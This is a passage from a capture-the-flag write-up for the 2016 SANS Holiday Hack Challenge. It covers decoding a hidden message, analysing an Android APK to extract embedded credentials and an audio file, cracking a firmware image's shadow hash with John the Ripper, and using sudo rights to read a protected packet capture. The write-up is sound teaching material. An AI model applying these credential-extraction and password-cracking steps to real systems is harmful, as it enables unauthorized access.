SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........<GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............<QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......<HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................<NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF
HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ@'.............sPEACEONEARTHELFWCHRISTMAS
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ
SANTAGOODWILLTOWARDSMENQQWELFQQ@'.............sQWGOODWILLTOWARDSMENJOYJOYQQ
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ
NORTHPOLECHRISTMASELFQQWELFQ@'.............aWCHRISTMASELFPEACEONEARTHQQWELF
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY
CHRISTMASSANTACHRISTMASQQ@'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ
JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ
NORTHPOLEJOYHOHOHOF.............."????????????????4PEACEONEARTHQQWHOHOHOELF
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF
NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ
ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ@^.]HOHOHOHOHOHOELFCHRISTMAS
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY
CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ@"....]JOYGOODWILLTOWARDSMENJOY
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW".......]PEACEONEARTHELFQQWELFWQQ
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW"..........]GOODWILLTOWARDSMENELFELF
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW".............]HOHOHOHOHOHONORTHPOLEJOY
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ

For the moment, we have no idea what this hidden message might mean, so let’s put that to one side for now and have a look at the Instagram account.

The santawclaus Instagram account was host to three images, only one of which appears to contain information; the one of the messy desk.

Close inspection reveals a couple of interesting artefacts; the first is the obscured nmap scan report for the domain www.northpolewonderland.com and the other is the end of what looks like a PowerShell command on the laptop screen which seems to suggest the creation of a file with filename SantaGram_v4.2.zip.

First of all, we consult Tom Hessman in the quest world to make sure that www.northpolewonderland.com (130.211.124.143) is in scope, and he warns us that whilst this machine is part of the challenge, it should only be used for acquiring static content hosted on the webserver there, not attacked in any way.

This hints to us that as we come across filenames, it’s probably worth seeing if they are hosted on this site. If we apply this logic and attempt to fetch http://www.northpolewonderland.com/SantaGram_v4.2.zip, it seems we have correctly guessed a static asset deserving of our attention.

Attempting to extract the ZIP file reveals to us that password protection has been employed, but this is where Santa’s hidden message comes into play; the password for the archive is bugbounty. Inside, is SantaGram_4.2.apk - the social media Android application that so many of the elves in the quest world were talking about.

Part 2: Awesome Package Konveyance

Now that we have our Android application package file, SantaGram_4.2.apk, it’s time for us to dive in and see what we can discover, using a mixture of dynamic analysis and forensic work, and using the hints given to us by the folk in the quest world to guide us.

First, we load the APK into an Android emulator to see how it behaves when it is running. I chose to use Genymotion, since it was recommended in the excellent SANS blog post, Ghost in the Droid: Reverse Engineering Android Apps by Ed Skoudis.

By proxying the emulated OS’s network traffic through OWASP ZAP, and trusting ZAP’s CA certificate in the emulated OS, we can observe the app’s HTTP(S) activity. We see communication with a few endpoints as we put the app’s functionality through it’s paces:

ads.northpolewonderland.com (104.198.221.240)
analytics.northpolewonderland.com (104.198.252.157)
ex.northpolewonderland.com (104.154.196.33)

We will come back and analyse these individually later, but for now we can answer the question of what credentials are embedded in the APK from this dynamic analysis - a sample payload from a request to the analytics site reveals the credentials we were probably looking for:

{  
   "username": "guest",
   "password": "busyreindeer78",
   "type":     "usage",
   "activity": "SplashScreen",
   "udid":     "ae26ee9299bb87f0"
}

We will probably have to take a different approach to our analysis in order to acquire the hidden audio that we’re looking for, as it seems unlikely this is going to travel across the wire. Let’s follow the excellent advice of another SANS blog post, Mining Android Secrets (Decoding Android App Resources), once again by Ed Skoudis.

We pass our Android application through apktool in order to extract the resources contained therein. Since we know we’re looking for an audio file, we could guess that we’re looking for a file with extension .mp3 and use find -iname '*.mp3' to try and find it, which turns up res/raw/discombobulatedaudio1.mp3 (MD5 hash b7aca2f218c39b997bfd61b83856aed2).

By also examining the res/values/strings.xml resource, we see the following further endpoints referenced which will be important for part 4 of the challenge:

dev.northpolewonderland.com (35.184.63.245)
dungeon.northpolewonderland.com (35.184.47.139)

Part 3: A Fresh-Baked Holiday Pi

Back in the story world, we’ve been hard at work tracking down the parts of the Cranberry Pi. Upon acquiring the Cranberry Pi board from the hidden fireplace room, the HDMI cable from the reindeer stables (moo!), the power cord from beside the snowman, the heatsink from the loft area, and the SD card from the end of the walkway in the clouds, it is now time to revisit Holly Evergreen. She provides us with the final piece of the Cranberry Pi puzzle; a link to the firmware image, Cranbian, that runs on the pi board. She tells us that we need to recover the password for the cranpi user account in order to be able to use the pi board in the story world.

Having downloaded and extracted the cranbian.img file, we follow the advice of another convenient blog post, Mount a Raspberry Pi File System Image, again by Ed Skoudis.

Once we have the image mounted, we can grab the shadow file from /etc/shadow and use the hints provided to us by Minty Candycan in the story world by pointing John The Ripper at it using the RockYou wordlist. In no time at all, the password cracking software has recovered the cranpi user’s password; yummycookies.

Upon telling Holly Evergreen the password to the cranpi user account, we now find ourselves with the ability to interact with the various terminals that are dotted throughout the story world.

Terminal - Elf House #2

This terminal greets us with the following banner

*******************************************************************************
*                                                                             *
*To open the door, find both parts of the passphrase inside the /out.pcap file* 
*                                                                             *
*******************************************************************************

Examining the permissions of the /out.pcap file shows us that it is owned by user itchy and only they have permissions to read the file, but unfortunately our primary prompt string indicates that our shell is running the context of user scratchy.

Let’s see if we have any sudo permissions:

scratchy@2bb2b19b8c63:~$ sudo -l
<Matching Defaults entries for scratchy on 1fae5a6f6ac5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User scratchy may run the following commands on 1fae5a6f6ac5:
    (itchy) NOPASSWD: /usr/sbin/tcpdump
    (itchy) NOPASSWD: /usr/bin/strings

It would seem that we are able to run the tcpdump and strings commands as itchy without having to know our own password, how convenient. Let’s first pass the packet capture file through strings to see if there are any interesting plaintext tokens:

scratchy@2bb2b19b8c63:~$ sudo -u itchy strings -20 /out.pcap
BGET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
OServer: SimpleHTTP/0.6 Python/2.7.12+
ODate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: text/html
PContent-Length: 113
PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT
<input type="hidden" name="part1" value="santasli" />
